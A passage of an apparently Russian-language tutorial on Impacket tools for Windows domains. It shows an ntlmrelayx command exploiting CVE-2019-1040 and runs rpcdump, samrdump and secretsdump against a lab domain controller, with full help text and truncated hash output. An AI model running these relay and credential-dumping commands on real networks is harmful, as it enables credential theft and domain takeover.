  \u0415\u0441\u043b\u0438 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438 NTLM Relay<\/font><\/b> \u043d\u0430 LDAPS-\u0441\u0435\u0440\u0432\u0435\u0440, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2019-1040 <\/a>\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u0440\u0435\u0434\u044b (\u0438\u043c\u044f \u0438 \u043f\u0430\u0440\u043e\u043b\u044c) \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0441\u043e\u0432\u0441\u0435\u043c \u043d\u0435 \u0434\u0430\u0432\u043d\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u044d\u0442\u0430 \u0442\u0435\u043c\u0430 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u043a\u043e\u043b\u043b\u0435\u0433\u0430\u043c\u0438 \u043f\u043e \u0425\u0430\u0431\u0440\u0443<\/a>):<\/p>\n
python3 ntlmrelayx.py -t ldaps:\/\/192.168.1.13 --remove-mic --delegate-access <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: ntlmrelayx.py [-h] [-ts] [-debug] [-t TARGET] [-tf TARGETSFILE] [-w]                      [-i] [-ip INTERFACE_IP] [--no-smb-server]                      [--no-http-server] [--no-wcf-server] [--no-raw-server]                      [--smb-port SMB_PORT] [--http-port HTTP_PORT]                      [--wcf-port WCF_PORT] [--raw-port RAW_PORT]                      [--no-multirelay] [-ra] [-r SMBSERVER] [-l LOOTDIR]                      [-of OUTPUT_FILE] [-codec CODEC] [-smb2support]                      [-ntlmchallenge NTLMCHALLENGE] [-socks] [-wh WPAD_HOST]                      [-wa WPAD_AUTH_NUM] [-6] [--remove-mic]                      [--serve-image SERVE_IMAGE] [-c COMMAND] [-e FILE]                      [--enum-local-admins] [-rpc-mode {TSCH}] [-rpc-use-smb]                      [-auth-smb [domain\/]username[:password]]                      [-hashes-smb LMHASH:NTHASH] [-rpc-smb-port {139,445}]                      [-q QUERY] [-machine-account MACHINE_ACCOUNT]                      [-machine-hashes LMHASH:NTHASH] [-domain DOMAIN]                      [-remove-target] [--no-dump] [--no-da] [--no-acl]                      [--no-validate-privs] [--escalate-user ESCALATE_USER]                      [--add-computer [COMPUTERNAME [PASSWORD ...]]]                      [--delegate-access] [--sid] [--dump-laps] [--dump-gmsa]                      [--dump-adcs] [-k KEYWORD] [-m MAILBOX] [-a]                      [-im IMAP_MAX] [--adcs] [--template TEMPLATE]                      [--altname ALTNAME] [--shadow-credentials]                      [--shadow-target SHADOW_TARGET]                      [--pfx-password PFX_PASSWORD] [--export-type {PEM, PFX}]                      [--cert-outfile-path CERT_OUTFILE_PATH]   Main options:   -h, --help            show this help message and exit   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON   -t TARGET, --target TARGET                         Target to relay the credentials to, can be an IP,                         hostname or URL like domain\\username@host:port                         (domain\\username and port are optional, and don't                         forget to escape the '\\'). If unspecified, it will                         relay back to the client')   -tf TARGETSFILE       File that contains targets by hostname or full URL,                         one per line   -w                    Watch the target file for changes and update target                         list automatically (only valid with -tf)   -i, --interactive     Launch an smbclient or LDAP console insteadof                         executing a command after a successful relay. This                         console will listen locally on a tcp port and can be                         reached with for example netcat.   -ip INTERFACE_IP, --interface-ip INTERFACE_IP                         IP address of interface to bind SMB and HTTP servers   --smb-port SMB_PORT   Port to listen on smb server   --http-port HTTP_PORT                         Port(s) to listen on HTTP server. Can specify multiple                         ports by separating them with `,`, and ranges with                         `-`. Ex: `80,8000-8010`   --wcf-port WCF_PORT   Port to listen on wcf server   --raw-port RAW_PORT   Port to listen on raw server   --no-multirelay       If set, disable multi-host relay (SMB and HTTP                         servers)   -ra, --random         Randomize target selection   -r SMBSERVER          Redirect HTTP requests to a file:\/\/ path on SMBSERVER   -l LOOTDIR, --lootdir LOOTDIR                         Loot directory in which gathered loot such as SAM                         dumps will be stored (default: current directory).   -of OUTPUT_FILE, --output-file OUTPUT_FILE                         base output filename for encrypted hashes. Suffixes                         will be added for ntlm and ntlmv2   -codec CODEC          Sets encoding used (codec) from the target's output                         (default \"utf-8\"). If errors are detected, run                         chcp.com at the target, map the result with https:\/\/do                         cs.python.org\/3\/library\/codecs.html#standard-encodings                         and then execute ntlmrelayx.py again with -codec and                         the corresponding codec   -smb2support          SMB2 Support   -ntlmchallenge NTLMCHALLENGE                         Specifies the NTLM server challenge used by the SMB                         Server (16 hex bytes long. eg: 1122334455667788)   -socks                Launch a SOCKS proxy for the connection relayed   -wh WPAD_HOST, --wpad-host WPAD_HOST                         Enable serving a WPAD file for Proxy Authentication                         attack, setting the proxy host to the one supplied.   -wa WPAD_AUTH_NUM, --wpad-auth-num WPAD_AUTH_NUM                         Prompt for authentication N times for clients without                         MS16-077 installed before serving a WPAD file.                         (default=1)   -6, --ipv6            Listen on both IPv6 and IPv4   --remove-mic          Remove MIC (exploit CVE-2019-1040)   --serve-image SERVE_IMAGE                         local path of the image that will we returned to                         clients   -c COMMAND            Command to execute on target system (for SMB and RPC).                         If not specified for SMB, hashes will be dumped                         (secretsdump.py must be in the same directory). For                         RPC no output will be provided.    --no-smb-server       Disables the SMB server   --no-http-server      Disables the HTTP server   --no-wcf-server       Disables the WCF server   --no-raw-server       Disables the RAW server  SMB client options:   -e FILE               File to execute on the target system. If not                         specified, hashes will be dumped (secretsdump.py must                         be in the same directory)   --enum-local-admins   If relayed user is not admin, attempt SAMR lookup to                         see who is (only works pre Win 10 Anniversary)  RPC client options:   -rpc-mode {TSCH}      Protocol to attack, only TSCH supported   -rpc-use-smb          Relay DCE\/RPC to SMB pipes   -auth-smb [domain\/]username[:password]                         Use this credential to authenticate to SMB (low-                         privilege account)   -hashes-smb LMHASH:NTHASH   -rpc-smb-port {139,445}                         Destination port to connect to SMB  MSSQL client options:   -q QUERY, --query QUERY                         MSSQL query to execute(can specify multiple)  HTTP options:   -machine-account MACHINE_ACCOUNT                         Domain machine account to use when interacting with                         the domain to grab a session key for signing, format                         is domain\/machine_name   -machine-hashes LMHASH:NTHASH                         Domain machine hashes, format is LMHASH:NTHASH   -domain DOMAIN        Domain FQDN or IP to connect using NETLOGON   -remove-target        Try to remove the target in the challenge message (in                         case CVE-2019-1019 patch is not installed)  LDAP client options:   --no-dump             Do not attempt to dump LDAP information   --no-da               Do not attempt to add a Domain Admin   --no-acl              Disable ACL attacks   --no-validate-privs   Do not attempt to enumerate privileges, assume                         permissions are granted to escalate a user via ACL                         attacks   --escalate-user ESCALATE_USER                         Escalate privileges of this user instead of creating a                         new one   --add-computer [COMPUTERNAME [PASSWORD ...]]                         Attempt to add a new computer account   --delegate-access     Delegate access on relayed computer account to the                         specified account   --sid                 Use a SID to delegate access rather than an account                         name   --dump-laps           Attempt to dump any LAPS passwords readable by the                         user   --dump-gmsa           Attempt to dump any gMSA passwords readable by the                         user   --dump-adcs           Attempt to dump ADCS enrollment services and                         certificate templates info  IMAP client options:   -k KEYWORD, --keyword KEYWORD                         IMAP keyword to search for. If not specified, will                         search for mails containing \"password\"   -m MAILBOX, --mailbox MAILBOX                         Mailbox name to dump. Default: INBOX   -a, --all             Instead of searching for keywords, dump all emails   -im IMAP_MAX, --imap-max IMAP_MAX                         Max number of emails to dump (0 = unlimited, default:                         no limit)  AD CS attack options:   --adcs                Enable AD CS relay attack   --template TEMPLATE   AD CS template. Defaults to Machine or User whether                         relayed account name ends with `$`. Relaying a DC                         should require specifying `DomainController`   --altname ALTNAME     Subject Alternative Name to use when performing ESC1                         or ESC6 attacks.  Shadow Credentials attack options:   --shadow-credentials  Enable Shadow Credentials relay attack (msDS-                         KeyCredentialLink manipulation for PKINIT pre-                         authentication)   --shadow-target SHADOW_TARGET                         target account (user or computer$) to populate msDS-                         KeyCredentialLink from   --pfx-password PFX_PASSWORD                         password for the PFX stored self-signed certificate                         (will be random if not set, not needed when exporting                         to PEM)   --export-type {PEM, PFX}                         choose to export cert+private key in PEM or PFX (i.e.                         #PKCS12) (default: PFX))   --cert-outfile-path CERT_OUTFILE_PATH                         filename to store the generated self-signed PEM or PFX                         certificate and key<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d rpcdump<\/font><\/h3>\n
  \u0421\u043a\u0440\u0438\u043f\u0442 \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0442\u043e\u0447\u043a\u0430\u0445 RPC<\/i>. \u0417\u0430 \u043a\u0430\u0436\u0434\u043e\u0439 \u0438\u0437 \u043d\u0438\u0445 \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0441\u0432\u043e\u0439 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0438\u043b\u0438 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u0430\u044f \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 DLL<\/i>:<\/p>\n
python3 rpcdump.py admin:password@192.168.1.13  [*] Retrieving endpoint list from 192.168.1.13 Protocol: [MS-RSP]: Remote Shutdown Protocol Provider: wininit.exe UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 Bindings:           ncacn_ip_tcp:192.168.1.13[49664]           ncalrpc:[WindowsShutdown]           ncacn_np:\\\\WIN-LIELOSOD7LK[\\PIPE\\InitShutdown]           ncalrpc:[WMsgKRpc068A60]  Protocol: N\/A Provider: winlogon.exe UUID    : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 Bindings:           ncalrpc:[WindowsShutdown]           ncacn_np:\\\\WIN-LIELOSOD7LK[\\PIPE\\InitShutdown]           ncalrpc:[WMsgKRpc068A60]           ncalrpc:[WMsgKRpc069221]           ncalrpc:[WMsgKRpc04BFBAD2] ...  [*] Received 458 endpoints. <\/code><\/pre>\n
  \u0412\u044b\u0432\u043e\u0434 \u0431\u0443\u0434\u0435\u0442 \u0433\u0440\u043e\u043c\u043e\u0437\u0434\u043a\u0438\u043c, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0438\u0441\u043a\u0430\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0446\u0435\u043b\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0443 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0435\u0439 \u0441\u043b\u0443\u0436\u0431\u044b Print System Remote Protocol<\/i>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438:<\/p>\n
rpcdump.py @192.168.1.10 | grep MS-RPRN  Protocol: [MS-RPRN]: Print System Remote Protocol <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: rpcdump.py [-h] [-debug] [-target-ip ip address] [-port [destination port]] [-hashes LMHASH:NTHASH] target   positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>  optional arguments:   -h, --help            show this help message and exit   -debug                Turn DEBUG output ON  connection:   -target-ip ip address                         IP Address of the target machine. If ommited it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to RPC Endpoint Mapper  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d samrdump<\/font><\/h3>\n
  \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. \u0410\u0442\u0440\u0438\u0431\u0443\u0442 UID<\/a> 5xx \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0438\u043d\u0442\u0435\u0433\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 (\u043f\u0440\u0435\u0434\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435) \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 Windows Server. Ruvds, test \u0438 admin<\/i> \u2014 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430. \u041f\u043e\u0440\u044f\u0434\u043e\u043a \u0432\u043e\u0437\u0440\u0430\u0441\u0442\u0430\u043d\u0438\u044f UID \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0441\u0432\u044f\u0437\u0430\u043d \u0441 \u043e\u0447\u0435\u0440\u0451\u0434\u043d\u043e\u0441\u0442\u044c\u044e \u0438\u0445 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f. \u041a\u0440\u043e\u043c\u0435 \u044d\u0442\u043e\u0433\u043e, \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043c\u043d\u043e\u0433\u043e \u0434\u0440\u0443\u0433\u043e\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438: UserComment, PrimaryGroupId<\/a>, BadPasswordCount<\/a>, LogonCount<\/a>, PasswordLastSet<\/a>, PasswordDoesNotExpire<\/a>, AccountIsDisabled<\/a>, ScriptPath<\/a>:<\/p>\n
python3 samrdump.py admin:password@192.168.1.13  Found domain(s):  . AD  . Builtin [*] Looking up users in domain AD Found user: \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440, uid = 500 Found user: \u0413\u043e\u0441\u0442\u044c, uid = 501 Found user: krbtgt, uid = 502 Found user: Ruvds, uid = 1107 Found user: test, uid = 1112 Found user: admin, uid = 1114 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/FullName: \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/UserComment: \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/PrimaryGroupId: 513 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/BadPasswordCount: 4 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/LogonCount: 220 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/PasswordLastSet: 2022-07-03 21:47:50.410770 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/PasswordDoesNotExpire: True \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/AccountIsDisabled: False \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/ScriptPath: \u0413\u043e\u0441\u0442\u044c (501)\/FullName: \u0413\u043e\u0441\u0442\u044c (501)\/UserComment: \u0413\u043e\u0441\u0442\u044c (501)\/PrimaryGroupId: 514 \u0413\u043e\u0441\u0442\u044c (501)\/BadPasswordCount: 0 \u0413\u043e\u0441\u0442\u044c (501)\/LogonCount: 0 \u0413\u043e\u0441\u0442\u044c (501)\/PasswordLastSet: <never> \u0413\u043e\u0441\u0442\u044c (501)\/PasswordDoesNotExpire: True \u0413\u043e\u0441\u0442\u044c (501)\/AccountIsDisabled: True \u0413\u043e\u0441\u0442\u044c (501)\/ScriptPath: krbtgt (502)\/FullName: krbtgt (502)\/UserComment: krbtgt (502)\/PrimaryGroupId: 513 krbtgt (502)\/BadPasswordCount: 0 krbtgt (502)\/LogonCount: 0 krbtgt (502)\/PasswordLastSet: 2022-07-21 11:57:31.728056 krbtgt (502)\/PasswordDoesNotExpire: False krbtgt (502)\/AccountIsDisabled: True krbtgt (502)\/ScriptPath: Ruvds (1107)\/FullName: Ru Vds Ruvds (1107)\/UserComment: Ruvds (1107)\/PrimaryGroupId: 513 Ruvds (1107)\/BadPasswordCount: 0 Ruvds (1107)\/LogonCount: 21 Ruvds (1107)\/PasswordLastSet: 2022-08-24 22:12:13.125652 Ruvds (1107)\/PasswordDoesNotExpire: True Ruvds (1107)\/AccountIsDisabled: False Ruvds (1107)\/ScriptPath: test (1112)\/FullName: Test_Name Test_Surname test (1112)\/UserComment: test (1112)\/PrimaryGroupId: 513 test (1112)\/BadPasswordCount: 0 test (1112)\/LogonCount: 2 test (1112)\/PasswordLastSet: 2023-01-12 20:56:06.969165 test (1112)\/PasswordDoesNotExpire: True test (1112)\/AccountIsDisabled: False test (1112)\/ScriptPath: admin (1114)\/FullName: Admin AdminFemale admin (1114)\/UserComment: admin (1114)\/PrimaryGroupId: 513 admin (1114)\/BadPasswordCount: 0 admin (1114)\/LogonCount: 1 admin (1114)\/PasswordLastSet: 2023-01-24 20:05:11.514038 admin (1114)\/PasswordDoesNotExpire: True admin (1114)\/AccountIsDisabled: False admin (1114)\/ScriptPath: [*] Received 6 entries. <\/code><\/pre>\n
  \u0412 \u0432\u044b\u0432\u043e\u0434\u0435 \u0432\u0438\u0434\u0435\u043d \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u0434\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438, \u0432 \u043a\u0430\u043a\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 \u043e\u043d\u0430 \u0432\u0445\u043e\u0434\u0438\u0442, \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0432\u043e\u0434\u0430 \u043f\u0430\u0440\u043e\u043b\u044f, \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u0445\u043e\u0434\u043e\u0432 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0434\u043e\u043c\u0435\u043d\u0430, \u0434\u0430\u0442\u0430 \u0438 \u0432\u0440\u0435\u043c\u044f, \u043a\u043e\u0433\u0434\u0430 \u043f\u0430\u0440\u043e\u043b\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u043b\u0441\u044f \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0440\u0430\u0437, \u043f\u0440\u043e\u0442\u0443\u0445\u0430\u0435\u0442 \u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u0438\u043b\u0438 \u043d\u0435\u0442, \u0430\u043a\u0442\u0438\u0432\u043d\u0430 \u043b\u0438 \u0443\u0447\u0451\u0442\u043a\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0443\u0442\u044c \u0434\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d \u043f\u0440\u0438 \u0432\u0445\u043e\u0434\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u0435\u0441\u043b\u0438 \u0442\u0430\u043a\u043e\u0439 \u0438\u043c\u0435\u0435\u0442\u0441\u044f). \u0412\u044b\u0432\u043e\u0434 \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u043a\u0430\u043d\u0434\u0438\u0434\u0430\u0442\u043e\u0432 \u0432 honeypot<\/a>.<\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: samrdump.py [-h] [-csv] [-ts] [-debug] [-dc-ip ip address] [-target-ip ip address] [-port [destination port]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]                    target   positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>  optional arguments:   -h, --help            show this help message and exit   -csv                  Turn CSV output   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON  connection:   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If ommited it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d secretsdump<\/font><\/h3>\n
  \u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0445\u0435\u0448\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u043d\u0430 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u043e \u0441\u043b\u043e\u0432\u0430\u0440\u044e \u0438\u043b\u0438 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 Pass-the-hash<\/a><\/font><\/b> \u0432 \u0441\u0432\u043e\u0451\u043c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u043c \u0432\u0438\u0434\u0435:<\/p>\n
python3 secretsdump.py admin:password@192.168.1.13  [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xafb23...1b9 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:500:aad....5b51404ee:ee24c810d...3b14b3f::: \u0413\u043e\u0441\u0442\u044c:501:aad3b435...1404ee:31d6cfe...e0c089c0::: DefaultAccount:503:aad3...51404ee:31d6cf...c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain\/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC AD\\WIN-LIELOSOD7LK$:aes256-cts-hmac-sha1-96:a5fc6f195...427414a7a AD\\WIN-LIELOSOD7LK$:aes128-cts-hmac-sha1-96:38b3187...694eb2e98 AD\\WIN-LIELOSOD7LK$:des-cbc-md5:5bf16b...2f1 AD\\WIN-LIELOSOD7LK$:plain_password_hex:db8e2a...03831c0 AD\\WIN-LIELOSOD7LK$:aad3b435...37d846be8::: [*] DPAPI_SYSTEM dpapi_machinekey:0x1165a8d...c28c8e5fa dpapi_userkey:0xb7a4fea5f...83745a [*] NL$KM  0000   49 66 CC 64 01 42 79 3B  7F CA CB F6 04 E7 AD 22   If.d.By;.......\"  0030   47 DD BD EB CB 26 AC 4E  69 17 13 25 EE 37 0D 41   G....&.Ni..%.7.A NL$KM:4966cc640142...25ee370d41 [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:500:aad...04ee:ee24c81...4b3f::: \u0413\u043e\u0441\u0442\u044c:501:aad3b435b...404ee:31d6...89c0::: krbtgt:502:aad...04ee:1596e...34c8::: ad.ruvds.ru\\Ruvds:1107:aad3b4...ee:ee24...14b3f::: ad.ruvds.ru\\test:1112:aad...4ee:ee24c...3f::: ad.ruvds.ru\\admin:1114:aad3...4ee:ee24c8...3f::: WIN-LIELOSOD7LK$:1003:aad3...4ee:04f9...be8::: RUVDSMASTER$:1106:aad3...4ee:b2438...c725::: RUVDS-PC$:1108:aad3b...4ee:a03f...99::: RBCDmachine$:1111:aad...ee:7b592...87::: [*] Kerberos keys grabbed \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:aes256-cts-hmac-sha1-96:939a4fd...2fb \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:aes128-cts-hmac-sha1-96:71ea...0b6e507 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:des-cbc-md5:a151...4f krbtgt:aes256-cts-hmac-sha1-96:890c7d940...75cad82 krbtgt:aes128-cts-hmac-sha1-96:9ed...15 krbtgt:des-cbc-md5:da08...8a54 ad.ruvds.ru\\Ruvds:aes256-cts-hmac-sha1-96:3805dfb...2ef7e ad.ruvds.ru\\Ruvds:aes128-cts-hmac-sha1-96:35e...42f ad.ruvds.ru\\Ruvds:des-cbc-md5:921...576 ad.ruvds.ru\\test:aes256-cts-hmac-sha1-96:6bb...8c5 ad.ruvds.ru\\test:aes128-cts-hmac-sha1-96:860...f5af ad.ruvds.ru\\test:des-cbc-md5:bfabe...f40da ad.ruvds.ru\\admin:aes256-cts-hmac-sha1-96:df00...64e0 ad.ruvds.ru\\admin:aes128-cts-hmac-sha1-96:678...b091 ad.ruvds.ru\\admin:des-cbc-md5:523b...b WIN-LIELOSOD7LK$:aes256-cts-hmac-sha1-96:a5fc6...a7a WIN-LIELOSOD7LK$:aes128-cts-hmac-sha1-96:38b318...e98 WIN-LIELOSOD7LK$:des-cbc-md5:5bf16...f1 RUVDSMASTER$:aes256-cts-hmac-sha1-96:e0b50bf...009b RUVDSMASTER$:aes128-cts-hmac-sha1-96:a300...34fb43 RUVDSMASTER$:des-cbc-md5:bafd...98ce RUVDS-PC$:aes256-cts-hmac-sha1-96:f3d8297527e...5c00c RUVDS-PC$:aes128-cts-hmac-sha1-96:c4c3ee...989c RUVDS-PC$:des-cbc-md5:94c1cb2...7c RBCDmachine$:aes256-cts-hmac-sha1-96:6a8c9058f0...399 RBCDmachine$:aes128-cts-hmac-sha1-96:7fdd...64f RBCDmachine$:des-cbc-md5:d3f7...110 <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
